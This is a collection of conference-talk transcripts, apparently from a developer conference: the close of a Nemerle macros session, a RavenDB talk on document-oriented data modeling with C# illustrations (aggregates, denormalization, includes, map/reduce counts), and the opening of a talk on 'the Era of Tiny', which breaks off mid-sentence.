do that. So we need to work on this expression. This expression is this part. Okay. So we need to check this one. Again we're going to use the match operator, match on the expression. And pattern matching can work with algebraic data types, numbers, strings, whatever, but it also supports quasi-quotation. So I can put all these things right inside. Pattern matching will check that the input expression matches this format. Okay. So now I'm going to move it right here. Okay. But we need to bind these things, these variables, these parts of our expression, to what we are going to generate. If you remember from the previous session, we can bind variables, we can introduce new variables in pattern matching. We can bind these variables to parts of our expressions. But if we use quasi-quotation, we have to use a slightly different syntax. We use the dollar sign for that. So now it means that pattern matching will check that we have this format, and all these parts, for example, this part will be bound to this variable, this one to y, and these parts will be bound to the xs and ys variables. And after that, we can use these variables in our quasi-quotation block to generate a new expression. So actually we're done. The only problem is that if we have any problem, we need to generate an error. Okay. We need to inform our user that something is wrong. 
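In C# terms, the expansion the foreach2 macro is meant to produce is roughly the two-enumerator loop written by hand above; the array contents and the WriteLine body are just placeholders for the user-supplied code.

```csharp
using System;
using System.Collections.Generic;

class Foreach2Expansion
{
    static void Main()
    {
        var xs = new[] { 1, 2, 3 };
        var ys = new[] { 4, 5, 6 };

        // foreach2 ((x, y) in (xs, ys)) { body }  expands to two enumerators walked in lockstep:
        IEnumerator<int> iter1 = ((IEnumerable<int>)xs).GetEnumerator();
        IEnumerator<int> iter2 = ((IEnumerable<int>)ys).GetEnumerator();

        while (iter1.MoveNext() && iter2.MoveNext())
        {
            var x = iter1.Current;
            var y = iter2.Current;
            Console.WriteLine($"{x}, {y}"); // the user-supplied body goes here
        }
    }
}
```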
So if our expression matches — if we find it is in this format — then we generate this code. If not, we're going to generate an error. We have a Message class and it has a FatalError method. This method takes two parameters: the location of our expression — because if anything is wrong, we want to report the error with information about where it happened, so we need this location — and then we can print something like expected, let's say, this and body. Okay. So now let's compile it and see if it works. Okay. It works. And as you can see, we have a new keyword — this is the foreach2 macro. We have a new keyword and we can even see what was generated by this macro. Okay. We can create more macros, and we can play with this one. For example, we can even use different languages. Let's try Chinese, for example. Foreach in Chinese is going to be something like that. Okay. So we have a macro with a keyword in Chinese. We already have the implementation, I'm just going to reuse it; instead of foreach, of course, we need a new name for the macro, so I'm going to use this. I have no idea what I'm doing, but let's try. Okay. Now we can compile it. And as you can see, we have new keywords. This is actually the dark side, I believe — if you get crazy, you can just rewrite the whole language; you can localize it and use, for example, Russian, Chinese, Norwegian, whatever. Okay. So actually, we are done. Here is our contact information: our site, nemerle.org; our Google group, where we discuss issues and language features; GitHub.com, where we host our sources; the download page; and our contact information. Vlad Chistyakov is the main brain behind Nemerle, together with Igor Kashi. So now if you have any questions, I would be happy to answer. Okay. No? Yeah. The best way — actually, this is an assembly, so you can distribute it as a usual project, as source, or you can compile it and distribute it as a DLL. It's just an assembly. You don't have to — we do have a reference to this assembly, but we only need that reference when we compile the project. Once we have an application, we don't care whether this macro assembly exists. If you have dependencies in your project — if you call some regular functions, ordinary methods in this assembly — then you have to ship it. But if you only use macros, you don't; you don't need to distribute it. Okay. And that's it. Thanks for coming.
|
Nemerle is one of the very few languages that can be extended by developers. Nemerle macros allow extending the language syntax and automating routine operations that developers face every day and cannot solve with traditional reusability techniques. We will also discuss DSL-oriented and language-oriented programming.
|
10.5446/50971 (DOI)
|
Hi guys. My name is Itamar. I work for Hibernating Rhinos; we make RavenDB. We see a lot of people who have real trouble getting into the non-relational mindset, so this session will hopefully help you get the idea of document-oriented design — specifically with RavenDB, which has some features that let you do some extra things you wouldn't have seen elsewhere. I call this session a walkthrough. We're not going to take one large project and just work off it, trying to spot all the problems and fix them; we will be using different samples, and if there is any model you would want to bring up, please do. In these kinds of sessions we actually appreciate the discussion, so please feel free to do so. Right. So how many of you have actually used RavenDB before, for a real project? Not many. So relational databases have been with us for quite a long time now — about 40 years — and many people feel a bit uncomfortable moving away from them. And even when they do move away, they keep using the same mindset with a non-relational database. I'm not only talking about document databases; I'm talking about anything that is not relational, even key-value stores and other tools like that. You will find people who use those tools in a way that fits the relational mindset, not the mindset you actually need when you're using a non-relational database. Relational databases were created around the 70s. A guy by the name of Edgar Codd wrote an academic paper in which he described what's called relational algebra. You probably already know that. But the point is that relational algebra, and the way relational databases work, is optimized for writes. Around the 70s you would have paid a lot of money to get even a small amount of storage space, but human hours didn't cost nearly as much. I don't have the exact numbers — we sometimes bring real numbers, but I'm not that good with them, forgive me — but you can see that people were willing to spend human hours to save space, because space cost a lot more, so they tried to use as little space as they could. Hence the term we all know: normalization. This is why you would normalize — you would have each piece of data stored once and never twice anywhere. But that's not the only difference between the 70s and now. There are many other differences. For example, there is another way of thinking about UI. Back in the 70s, the only UIs you would have seen were very simple ones. A UI like this one you wouldn't have seen back then — a very complex UI, where rendering one page actually costs quite a lot in terms of data and of intersecting data. Rendering this page alone would have cost quite a lot of operations. Let's take a look. We have a couple of questions. Stack Overflow — I can trust everybody here knows it. So we have a couple of questions, and the list of questions we can load from one table. We have the title, and we have the person who asked that question — that's another table. And now we have the score of that person, we have the number of views, we have how many answers.
We have votes, which will probably be stored somewhere else. We have tags. We have favorite tags. We have the menus which might not be static. All of those types of things will require rendering of quite a lot of data. And if we talk about relational, the relational scheme, we'll be talking about a lot of tables. Another thing is the number of views is actually using this application. So back in the 70s or even 10 years ago, you most probably won't be coding stuff to be used by too many people. Forty years ago, you would be writing an application to be used by one person only. Today, you are writing an application to be used by potentially millions. And that makes the difference between doing a few operations and doing not quite a few operations, like even doing one operation and we're doing 10 operations when you scale it to million users, that difference becomes quite large. Another example is, for example, is this eBay website. So we have a lot of products and we have the menus and then we have the cart. We have a lot of stuff like that that, again, makes a lot of queries necessary. A lot of joins. Joins are not that cheap as well. So let's start by thinking about an e-commerce website. For an e-commerce website, I would probably have products, a table of products, and each box that is going to pop up on the screen will represent a table. So I'm going to have a product table. I'm going to have an orders table because people want to order. And actually, I need to store the actual people as well. So I'm going to have three tables, but these are only the basic stuff. I mean, I do need to store all the lines what this person ordered. I do need to store the ways of available shipping, the ways of actually shipping the shipped data about that shipment. I will need to be storing discounts, available discounts, or discounts that will actually be used in an order. For a customer, I'll be storing probably some sort of payment details. Let's for a second assume that I'm storing credit card details and I encrypted. For products, I will be storing categories table because categories are hierarchical. I will need to store them in separate table and possibly make a lot of calculations. For example, what happens when I want to show a product display page and show some sort of breadcrumbs on the actual categories. So only display the categories is going to be a very costly operation because I now need to make some sort of recursive calls to my database. And then what happens when I want to have variants of products? What happens when I have different colors for a product, different sizes, if it's clothes, for example, more sophisticated variants, what happens then? It might be, might grow up to be in more than one additional table. So I'm in a big trouble here. So to be able to solve that, people have been moving from a relational databases to a non-relational databases. What is usually called the NoSQL movement. I'm not sure I quite like this term, NoSQL, even if you interpret it as like North only SQL, but the idea is that in relational database, you would have used many operations to provide one result. In those types of databases, we are moving away from relational databases to, we want to be able to make one operation, one logical operation, one database operation to perform one logical operation. That is, if I want to show a list of products or one product, I would want to make only one operation. I would want to load only that product. 
I wouldn't want to load the product and all the categories that it is in and then all the variants and touch that many tables and do that many joins. I would want to really avoid that. To do that, we use what we call a unit of change. That is, we are going to look at every piece of information of every, let's try not to use complex words right now. Let's try, we will be looking at each of those contained scenarios as a document. As we are talking about RevenDB, which is a document database, we are going to be looking at each of those as a document. We have a product. That product is going to contain all the information it needs to be accessible, to be usable to the user. We are going to send the user only one document instead of sending a lot of information from very different tables. Also for customers, I am going to load a customer to process an order. That customer data is going to be contained in one document. If I have additional information for him, for example, credit cards, it is going to be contained within the document. Same thing for orders. A product document, RevenDB stores everything within a JSON. JSON is basically very simple to read, very simple to write data representation, much easier than XML. That representation allows us to put even a hierarchical data within one document, within one document database entity. We can have a property for name, which is quite standard. Then we can have an array of colors. Then we can have non-string properties like a price or a weight. We can have objects contained within one object. This is one document. One document represents one object. I can contain more objects within it. For example, in an order document, I can have the customer, for example, the customer object contained within the order. I am not sure I want to do that. I will see in a second why. Basically, I can do that. In order document, we will contain the total price. It will contain an array of order lines objects. Each order line object will describe either a product or other stuff the user put into his order. I can put a shipping object. I can put the discounts to use, the discount codes, or whatever my logic is. Basically, it will just work without worrying too much. I don't need to do joints anymore. I can just talk with one document. This is called transactional boundaries. In domain-driven design, you might know it as an aggregate root. Basically, whenever you have one unit of change, you are going to contain it within a document. Every change is being made within the document. That's more or less the requirement, if to say that more clearly. This is basically how you identify your aggregate roots. You will be looking at what stuff you want to do, what operations, what data you want to read, and basically form that aggregate root, that unit of change based on that info, based on use cases. Different aggregate roots can be referenced each other using in RavenDB. Document IDs are basically strings, not integers or anything like that, like in relational databases. Basically, you will have, for example, you will have an order document and it can reference the user, for example. Instead of containing the user, it could have just referenced the user by storing a string customer ID property and then just store that user ID in that property. Let's take two more examples for that use. I have a shipping company, or my company makes a lot of shipments, and I want to track them. I'm using UPS or FedEx, and they send my packages, and they ping me on each and every event. 
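Pausing the shipping example for a moment: here is roughly what the product and order documents just described might look like as plain C# classes. All class and property names are illustrative, not a prescribed schema, and the usual using System.Collections.Generic is assumed.

    using System.Collections.Generic;

    // One document per aggregate; arrays and nested objects live inside it.
    public class Product
    {
        public string Id { get; set; }            // e.g. "products/1"
        public string Name { get; set; }
        public string[] Colors { get; set; }      // variant-like data stays inside the document
        public decimal Price { get; set; }
        public double Weight { get; set; }
    }

    public class Order
    {
        public string Id { get; set; }            // e.g. "orders/1"
        public string CustomerId { get; set; }    // reference to another aggregate by its string id
        public decimal TotalPrice { get; set; }
        public List<OrderLine> Lines { get; set; }
        public ShippingInfo Shipping { get; set; }
        public List<string> DiscountCodes { get; set; }
    }

    public class OrderLine
    {
        public string ProductId { get; set; }
        public int Quantity { get; set; }
    }

    public class ShippingInfo
    {
        public string Method { get; set; }
        public string Address { get; set; }
    }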
Whenever my package moves country, I get a lot of events from the UPS or FedEx. I want to store those events. In relational database, I would have the shipment that I sent, and that shipment is going to have some sort of ID. Then whenever an event comes in, I will be putting an event with the shipping ID inside some sort of a table. Then whenever I would want to make a view of the shipping and to see the current status, even if I wanted to... Let me phrase that differently. If I wanted to see the current status of the shipment, I would have to touch the tables. If I wanted to see all the events, I would, for that shipment, I would have to touch at least two tables. To avoid that, and because basically a shipment event, an event that happened, basically has no meaning outside the contents of the shipping, the shipping itself, I would just contain it within one document. I would have a document of shipping, of a shipment, and that document will contain everything I need to know about the shipment. Then I have also an array of events. I can just manage the events within the array. I can make that, I can sort it, I can do that everything I want and store it in a stored or I can just load it and do operations in memory which are much cheaper than doing this on the server using some sort of a schema. Let's take another example. I mentioned categories, for example an e-commerce website. We usually make a differentiation between categories and tags. Tags are a concept that is flat. It just means I have that many tags available to me. I have a lot of, let's say, products, I have a lot of objects. I'm just tagging them. I have a lot of tags. I have one tag I'm putting on this product. I have three tags I'm putting to that product, et cetera, et cetera. Now categories are hierarchical. They are not flat. I have categories one under another. So it's basically tags but with some sort of a structure. So how would I represent that in a document database? Would I need one, one to suggest a way of doing that? So in a relational database, I would have used a table and each category would have a row and I would just probably iterate recursively on that. Even though I can even do that in a strong procedure to make it even more performant, but again, I will do several operations on certain scenarios. For example, if I wanted to get breadcrumbs for a product. Refinitably, we'll do that probably different. Now there's one small thing that I might need to mention. There is no real one way to make any design decisions. You have a lot of options in front of you usually and you will just have to understand what one option gives you and what other stuff the other option give you and you will have to decide for yourself what's best for you. Every option will have trade-offs. So for example, for this category scenario in an e-commerce solution, I would probably just go with one document containing all the categories directly sorted. That is one category object within a big document. I would have many, many, many categories and each category will contain the child categories of it, it has. And basically, that document might grow a bit large, but I can just have it on the client side. I can cache it. I can aggressively cache it. That's a RefinDB feature. It basically means I don't care if this document changes even once in an hour. I don't care. I want to update it only on every that minute. I mean, I can update it once in 24 hours. Because category, this category's document is not going to be updated too often. 
We usually see that in our applications. So I can just don't care about the actual updates that happen and only update it every 24 hours. So I'm going to cache a potentially large document on my client website, on my client application, and then do all the operations in memory. So I will have one, one object with hierarchical categories and we just alter it through them in memory. So I don't have any joints. I don't have any recursive operations on the server side. I only do this in memory without pulling new data and everything just works really fast. So we talked about three unit types of unit of change. The orders, products, and we saw how to handle shipment with events. And then we have this type of category. Now what this type of thinking gives us is for it can really affect scaling because what we have with relational databases is because we always need to have all the tables available to us, it is very hard to scale. It is all the related tables. And if one table grows large, we don't have much of a choice instead of just duplicating that table. So scaling with databases is more or less what caused the no SQL movement to start. Not the only reason because schema less is also important. But scaling is quite tough to do with SQL. When you have this concept of unit of change and you have all that data, all the data you need for one operation within one document, you basically can just much easier, it's much easier for you to scale. You can just say, okay, I want these types of documents here, these types of documents there. And even if you mix between, if you scale within the same type of documents, you basically end up having all the information you need even though not all the types of documents are on the same node. Another thing this gives us is faster operations because everything is now done on the same document. I only operate against, usually against one document. But yet, sometimes we talked about references between aggregate routes, between different documents. Now, we had an example of the order that have a list of order lines. And that list of order lines, I didn't mention how to implement that. But basically, we have the option of storing the actual document reference within that array. But what happens when the user name changes, or the product name changes, or the product price changes? Usually when we deal with these kinds of things, we get to something that we know as denormalization. We would want to denormalize the data. We would want to take that kind of data that we are working with and put it within the actual document that we are working with. For example, with the example I gave with orders. So we have an order document, and that order document is going to have a list of products. But in a year from now, I might want to load that order. And when I load that order, I might get to a point where I'm seeing the product name which was not like it was when the order was placed. And I might see a new price that wasn't there. To avoid that, I want to store the price, the name, the customer address, all of them within that order document. Because I don't care if the user change, the customer change is address. That specific order was sent to a specific address. So I'm going to just denormalize all of that within that same document. It might also help when sharding, because sometimes you might not have some types of documents within one shard, and you still want to index on it. And so that also might be useful there. 
So basically, this is how denormalization would look. If this is part of my order document, I would have an array of order lines, but instead of saving just the product ID, I would be saving the actual product info — at least the part of the info that I'm interested in. I probably won't denormalize images, because I don't really care if images change, but I will be storing the name, the variant that the user selected, the price, and other things like that. So what happens when a document grows too large? We talked about the category scenario, where a document might become very large, and I mentioned that we can use caching to solve that. One thing I should have mentioned is that that document probably won't be too large anyway, because all I'm storing is a lot of small strings — category names. It might get to one or two megabytes; nothing I should really be worried about. But sometimes the data we are storing is what we call unbounded: it might grow too large because it contains some sort of array, and that array just keeps on growing. So when you come to think about it, you have three types of scenarios. You have the bounded scenario, where you know the amount always has some upper limit. You have what you could call naturally bounded: if I'm storing data on people, I can assume quite safely that nobody will have 20 children, and 20 is already a large number in itself. And sometimes you have a genuinely unbounded array. So how do I handle that? For example, if I have an e-commerce website and I want to store an array of order lines, I come to this question. It is not naturally bounded, because basically anyone can order anything. It might be bounded if I only have a certain number of product types at any given time, but what if I don't — what if I constantly add more products, for example if I have many, many variants? So in unbounded scenarios we really should be thinking about how to make sure our document doesn't grow too large. We have basically two options. One is to cap the document. If I have the order document, I can just say: this order document can only contain up to 100 order lines. So I'm capping it by size — I'm saying this order-lines array will only ever hold that many order lines. What happens when a new order line comes in after I hit my limit? I still need to store it, but what I can do is take the order ID, which would probably be something like orders/1, and chain documents to one another. I can say: I have orders/1, which is my order, and I have orders/1/2, for example, which holds the rest of the order lines. So I can have several documents — one contains the actual order, and the rest contain the remaining order lines. I can also split the document: I can say, okay, I have one document containing all my order details, and then another document representing the order lines. And then again, I might want to cap that one by size as well.
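As a small illustration of the denormalized order line described above — a sketch only, with invented property names:

    // A denormalized order line: name and price are snapshots taken when the order
    // is placed, so later edits to the product don't rewrite the order's history.
    public class OrderLine
    {
        public string ProductId { get; set; }    // kept so we can still navigate to the product
        public string ProductName { get; set; }  // copied at order time
        public string Variant { get; set; }      // e.g. the colour or size the customer picked
        public decimal Price { get; set; }       // the price actually paid, not the current price
        public int Quantity { get; set; }
    }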
To be able to work with that efficiently, RavenDB introduces what's called an include. An include is basically a way to tell the server that you are interested in more documents other than the one you are asking for. So in this example, for example, I'm querying for all orders with some sort of criteria. I don't really care about what criteria that is. And then I'm telling it, please include based on this property here. What this will do, it will give me the order object directly from the server. But it will also include in that same server communication, it will also include the other customer document. The customer document it is going to pull is going to be represented by the order.customerid field. As I said, string is in RavenDB, sorry, the IDs in RavenDB are basically strings. So that document is going to be saved as a reference in this case. And the order object under the customer ID property is going to have a string ID of a customer, for example, customer slash two. This will be identified by RavenDB as an actual document ID. And it is going to send it to you along with the order document. It will send you when you issue this request. So the second line we have there, which is customer equals session.load, will cause no server communication. And that is important because I can either load different aggregate routes in one operation without being too chatty with the server, or I can load that way an order along with its, with the chained documents or with the, with the Capp documents that are related to it. So to demonstrate everything that we've been discussing now and to see several other options, let's try building a blog software. So in a blog software, you probably have what we call a blog, an actual blog post. You also have some sort of configurations. And you will need to be storing comments. So this is how subtext is doing that. Subtext is basically a very good blog engine that is, it is built on a Microsoft SQL server. But it is, because it uses SQL, it is relational. So this is how part of the model actually looks like. Only the relevant part, the relevant, the part that is relevant to us. There is some sort of configure. The content is actual blog posts. Then we have metadata, which is some metadata on actual blog, on the blog post or on the blog itself. Then we have feedback, which is comments, tags. As you, as you can see, the data is quite scattered around the database. So this is, for example, all the stored procedures called that are required to render the main page. When you render the main page, you show some stuff, some general stuff, and you want to get the config, you want to get menus, you want to get stuff like that. You want to get all the posts that are, you want to display on the home page. You want to show the top tags. You want to show other things. Not sure what they are here. And basically, you'll be touching quite a lot of tables. Some through joins, some directly. And this will, this basically inflicts a lot, a lot, a lot of operations. As I said when I started, this is not something that we actually want these days because we have a lot of users because our UIs are becoming more and more complex. So, and another thing that I already mentioned, but let's say this again, this model is basically optimized for write. It is very, very easy to add new data. But once you start loading for complex UIs, it is going to be very, very pricey. So RaccoonBlog is a blog software we wrote as a sample, as an official sample application for RavendB. 
And it is a blog software and it is based on RavendB. And this is, these are all the queries it needs to make to render the home page. Basically, this query here is going to display all the non-deleted posts that are until on a certain time range. And then a few other stuff to load, basically the blog config and some sections which are menus, some sort of menus, and the users. We also want to get some users data to know who posted which blog post, to have its name and stuff like that. So these are the trivial classes, some class of blog config and then some class of a user. But how would you envision the blog post class? Basically, you would want to have inside the blog post an array of all the comments, right? Because we are talking about a unit of change or an aggregate root. And that transactional boundary basically tells us put all the comments within the blog post object because a comment has no meaning outside the context of a blog post. However, this is not how we did that. We created a new class called post which will contain everything we need for an actual post. It's the title, the body, a list of string tags, a reference to the author. And then we had two properties, two interesting properties. One is comments count and one is comments ID. We did that because we had a simple assumption which is always true. In the home page or in any category of view, you're only viewing, you're only showing the actual blog post but you never show all the comments. So there's no real, it doesn't really make much sense to have the blog post, to have all the comments within the blog post. Because then whenever you load a blog post, basically you are loading the entire array of comments. And that's an operation that you don't really need to do. And then your blog post can grow to large and your network traffic is going to be consumed unnecessarily. So we split that, the comments, all the comments stuff. We took it outside of the post object. So now you have the comments count because we still care about how many comments there are. And we have some other comments object which is serialized and put somewhere else. This is how a comment object looks like. And this is how the post comments object that I'm talking of also looks like. So I will be creating a new post comments object whenever I create a new post object. And I will reference it in the comments ID here. And whenever a new comment comes in, I will only update this object here. It uses this field, the last comment ID, to somehow track the, to give new IDs to new comments internally. And then I'm going to update the post object with the new comments count. As I said, there are quite a few ways to do that. This is one of them, to update the actual post. I might want to get to not do that. For example, using this approach, I'm touching two objects. Or for example, what happens when, what happens when two users try to add a new comment concurrently? I do need to somehow make sure that the counts are updated correctly. I need to make sure I'm doing this within the same transaction. So basically, this is one way of doing that. Yeah. Okay. One thing. No, the comments ID here is a reference to this object here. No, you have a list of comment objects. And in that array, inside of each object, you will have some sort of ID. We do store IDs because we do want to be able to reference them in the UI. That's probably the only reason we actually do use it. Do we use IDs? 
Now, this CommentsId field here allows me to use includes efficiently, to load the post comments along with the post when I actually need them. I could have done this differently: instead of having such a tight connection between those two objects, I could have just created something like posts/1, stored the post under that ID, and added another document with an ID of posts/1/comments. Then, whenever I load a post, I already know what the comments document's ID is. That is a bit less useful when using actual queries, which is why we used this approach here. When we went to build the RavenDB website, we also wanted to support comments, but we had some issues we wanted to solve, so we went with another design for commenting. Instead of having one object storing all the comments for one entity, we created many, many small objects, each representing a single comment. I don't have it here, but it's basically just a simple comment class, and whenever a new comment comes in, I store it just like you're used to from the relational model: I store a new document, and it gets an ID something like comments/1. It has a property which refers to the actual entity — that is, which page the user commented on — and we use indexes to get all the comments back. Now, what's important to know about RavenDB is that it basically has two stores: the document store and the index store. The document store is completely ACID. Whenever I make an operation on it — whenever I load — I always get the latest data. Whenever I query, though, I'm not guaranteed to get the latest results. Indexes in RavenDB are updated in the background: whenever you make a change to your database, the changed document is sent to a background thread, and that thread updates the indexes as fast as it possibly can. But under high throughput, you might experience some latency before the latest results show up. You will always get results very fast — you never wait for the indexing process to complete — but RavenDB will tell you that the query results you just got are stale. Being stale usually doesn't mean much; we could open a full discussion on this now, but what it actually means here is that if we have a high throughput of people commenting on a page, some of those comments might not show up immediately — it might take a few seconds for them to appear on the page. We went with this design because we wanted an ID for each comment: we wanted to allow people to reply to each other, and for that you need to be able to reference a specific comment and say, okay, I'm replying to this one. We actually store the replies within one object. And we expected to have a lot of comments at some stage during the lifetime of the RavenDB website, so we wanted to allow for paging — and the best way to allow for paging is to get the results from queries against the indexes themselves. So again, we had a problem — we wanted to represent comments on things — and we've seen how we can treat that scenario with different solutions.
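A hedged sketch of the Post/PostComments split and the include-based load described above, written against the RavenDB .NET client; the shapes follow the talk, but the exact client calls and signatures may differ a little between RavenDB versions, and session is assumed to be an open document session.

    using System.Collections.Generic;

    public class Post
    {
        public string Id { get; set; }              // e.g. "posts/1"
        public string Title { get; set; }
        public string Body { get; set; }
        public List<string> Tags { get; set; }
        public string AuthorId { get; set; }        // reference to a user document
        public int CommentsCount { get; set; }      // denormalized count for list views
        public string CommentsId { get; set; }      // reference to the PostComments document
    }

    public class PostComments
    {
        public string Id { get; set; }
        public int LastCommentId { get; set; }      // used internally to hand out ids to new comments
        public List<Comment> Comments { get; set; }
    }

    public class Comment
    {
        public int Id { get; set; }
        public string Author { get; set; }
        public string Text { get; set; }
    }

    // One round trip: load the post and ask the server to include the comments document.
    var post = session.Include<Post>(x => x.CommentsId).Load("posts/1");
    var comments = session.Load<PostComments>(post.CommentsId);  // served from the session, no extra request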
So what we have seen so far is basically that modeling is something we really need to consider, and there is never really a single solution for anything. When you approach a problem, you usually want to identify your aggregate roots — we call that the unit of change, but they are pretty much the same thing. You can probably use DDD practices to find your aggregate roots and to shape them. We might sometimes take an aggregate root and split it into different documents, because of size considerations or other considerations. For example, say you have a company with a lot of customers and you store quite a bit of data for each customer, but you have different departments, and you want each department to only be able to look at and change the data that relates to it — you don't want the help desk department to be exposed to billing information, and there are many other such scenarios. What you can do is take this customer aggregate root and save only the basic data in the actual customer document: you have a document called customer/1 with all the basic information for him. Then you create more classes and more documents, each targeted at a specific department. So you have customer/1 for the basic information; then you store another document as customer/1/helpdesk, holding only the info relevant to the help desk; and for billing quite the same thing, customer/1/billing, and only there do you have the actual billing information — his credit card, his payment history, and so on. We also talked about denormalization: because you want to enable a point-in-time view of the data, you persist that data within your aggregate root even though you wouldn't have done so in any other scenario. So let's discuss one final scenario. I mentioned RavenDB being ACID on the document store; the indexes, on the other hand, operate in an eventually consistent way. Sometimes — I mentioned this in relation to the comments count — you want to be very strict about counts, and sometimes you don't really care. For example, take an events-registration application. You have an aggregate root of an event, and you store all the event data within it. But how do you handle registrations? You're going to have registrations somehow — do you want to know at any given time exactly how many registrations you have, or can you allow for some drift? I built a sample application called events dealer, available on GitHub. What it does, basically, is it has the event class, the event document, and you can do whatever you want with that event. But whenever a person registers, I create a new event-registration document with its own ID, and that document contains a reference to the event it refers to, along with the data on the actual user who registered. So basically the event registration mostly has no meaning outside the context of the specific event. But in a lot of websites that let you register for an event, you'll be making a lot of operations on the actual event document.
So you don't want to persist all of those registrations within the event, because you're doing so many operations on that event document — you're loading it every time, querying for it, and so on — and whenever a new registration comes in, it invalidates, for example, the cache for that event. You could do something like another document that contains all the registrations, pretty much like we did with the blog post comments. But there is another solution. You might say: okay, I don't need a strict count of how many registrations I have. Instead of updating that count within a document in an ACID fashion, I can just get the count from an index. I can have a map/reduce index calculate the count of registrations per event, grouping by the event ID they refer to, and then read that count from the index. Now, that count is not guaranteed to be correct up to the millisecond, but it is going to be correct enough — and many times people register for events and never show up. Let me put it another way: I don't want a hard limit implemented via ACID updates; I want a soft limit on events, even a soft limit with very little room for error. If I have an event with 150 places, I want to allow perhaps a few more to register. Under high throughput, getting the count from an index basically lets me do just that — it will sometimes allow a few more people to register. And then we get to one last point: optimistic concurrency is important to use when you do update counts within one document. For example, going back to the blog post comments example, we have a property that stores the current number of comments. We actually had a bug in RaccoonBlog for quite a while: if two people commented concurrently, only the last one would win — we would overwrite the comment made by the one who commented first. The reason it happened is that in RavenDB, when you save a document, you basically tell it: this is my document, this is my ID, just put that document under that ID. Without optimistic concurrency — which asks the server to check that you really have the latest version — you will sometimes be overwriting data. So when you do update things in an ACID fashion, just make sure you use optimistic concurrency; it is available on the session object, to make sure you don't overwrite any changes. That's about it. I could go on with several other examples, but I would rather take your questions if you have any. Yeah. Okay, the question was: what happens if you made some assumptions and then discovered they were wrong — you're basically asking about size estimations, right? When you suddenly discover that your document grows too large. That really depends on what actually changed in your way of thinking, or basically on what you want to do now. A lot of times things will just work: there is no schema, so you just change your document structure. Many changes can be done without any migration. Some changes will require a migration, and a migration you can do either as a one-time, long-running operation — if you can afford the downtime, depending on how long it takes —
You can actually do that live — you can use listeners and things like that to make the change. It really depends on the scenario, but basically it is more than doable. Okay. RavenDB — that's a general RavenDB question. Backup with RavenDB is basically supported by any enterprise-level tool, VSS and things like that. RavenDB also comes with a backup tool, but as long as you back up and plan to restore to the same machine, you can use any of those. If you are going to move between servers, you might want to use the import/export tool. Again, both ship with RavenDB. On GitHub — on Ayende's GitHub account. Yeah. Any other questions? All right. Thank you guys. Yeah. I can hardly hear you. Yes. There is a bundle shipping with RavenDB called the index replication bundle. Basically you create an index — a map/reduce or just a simple map index — and you let it work. You specify a connection string telling it which table to replicate to, and it will replicate the index to SQL. It doesn't make much sense to replicate data directly from Raven to SQL, but an index is basically already in a tabular structure, so you can replicate it to SQL Server, and from there you can use all the tooling available to you in SQL. Any other questions? Anyone else? Okay. Thank you guys.
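As a closing illustration of the registration-count idea from earlier in the talk, here is a hedged sketch of a map/reduce index that counts registrations per event, plus the optimistic-concurrency switch mentioned near the end. Class and property names are invented for the example; it assumes the RavenDB client's Raven.Client.Indexes namespace and System.Linq, and the exact API may vary between client versions.

    // Registrations are stored as their own small documents referencing the event by id.
    public class EventRegistration
    {
        public string Id { get; set; }
        public string EventId { get; set; }      // reference to the event document
        public string AttendeeName { get; set; }
    }

    // Map/reduce index: count registrations grouped by event. Reading from it gives a
    // count that may be slightly stale, which is fine for a soft limit.
    public class Registrations_CountByEvent : AbstractIndexCreationTask<EventRegistration, Registrations_CountByEvent.Result>
    {
        public class Result
        {
            public string EventId { get; set; }
            public int Count { get; set; }
        }

        public Registrations_CountByEvent()
        {
            Map = registrations => from r in registrations
                                   select new { r.EventId, Count = 1 };
            Reduce = results => from r in results
                                group r by r.EventId into g
                                select new { EventId = g.Key, Count = g.Sum(x => x.Count) };
        }
    }

    // Reading the (possibly stale) count for one event:
    var result = session.Query<Registrations_CountByEvent.Result, Registrations_CountByEvent>()
                        .FirstOrDefault(x => x.EventId == "events/1");
    var count = result == null ? 0 : result.Count;

    // When a count is instead updated inside a document, guard against lost updates:
    session.Advanced.UseOptimisticConcurrency = true;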
|
In this session we will use real-world examples to demonstrate the way of thinking required when modeling data to be persisted with RavenDB. Starting with naive uses, we will move to complex applications and see how different design considerations can help performance and affect scaling.
|
10.5446/50974 (DOI)
|
Okay — this is my second presentation of three. Welcome, and thanks for joining me here. The presentation is called the Era of Tiny. My name is Jimmy Nilsson and I work as a developer and architect for a company called factor10 in Sweden, doing pretty much what I think most of you are doing. I have also written some books, and I'm not too proud of one of those titles nowadays. I will come back to that. The ironic thing was that yesterday I got an email from someone telling me that that old book was very good, and that it was what helped people move from developers to architects. As if that is a different thing — I'm not sure about that. Anyway, I was proud for a minute when I got the mail. So, let's get started with this talk. The story here is that I wrote a blog post about the next big thing in our industry — we are always on the hunt for the next big thing — and I think now that the next big thing is actually extremely tiny. Writing that blog post was fun, but I thought, well, this blog post was very tiny itself, so maybe I should do some more about it. So I thought maybe I should give a little talk about it, and maybe also ask the audience for more ideas in this area. So let's get started and see what happens. If we take a step back, like 20 years ago, I think the style typically was that we joined one of the communities around a certain big company, a big vendor, and we lived in that space. We were taken care of; we got recommendations from that company. They gave us all we needed and we didn't have to think a lot. I think that was quite nice for me, because before 1990 I worked with a big — no, not big — a very small, obscure 4GL tool, and I was extremely happy every six months when they published a newspaper about that language. It was: wow, this is Christmas. Moving into the Microsoft space, which I did afterwards, was like heaven — finding information everywhere. Totally different. Really a big positive shift, I think. But after a while several of us started to — I guess we lost interest a little bit. Maybe we didn't get the best thing from that big vendor all the time; I think that was the feeling. Maybe you recognize this guy over here. Do you know what that is, on the head of that guy? Anyone? This is a long time ago — I used to have hair back then, so that's actually my hair. Anyway, I took a few steps in another direction, moving away from just following one big vendor. I'm not just talking about Microsoft here, of course; it was the same, I think, with IBM for example, and maybe still is. Many of you probably know about the MSDN way, which was the style here. So I moved away, and there was like a revolution going on, with lots of big open source projects that were heavily influencing those of us who listened and maybe participated as well. It was very much about Java, being a few years ahead of C# and .NET, coming out with loads of interesting things. It was very much about agile and extreme programming, very much about strong community building, things like that. There was a lot of focus on pretty large generic frameworks, which is what I call this era — that is, 5-10 years ago. Now I don't think I'm seeing a revolution; my observation is that it's more like an evolution. Instead of just listening to others, we are kind of growing in confidence, maybe, and we are turning inwards and seeing:
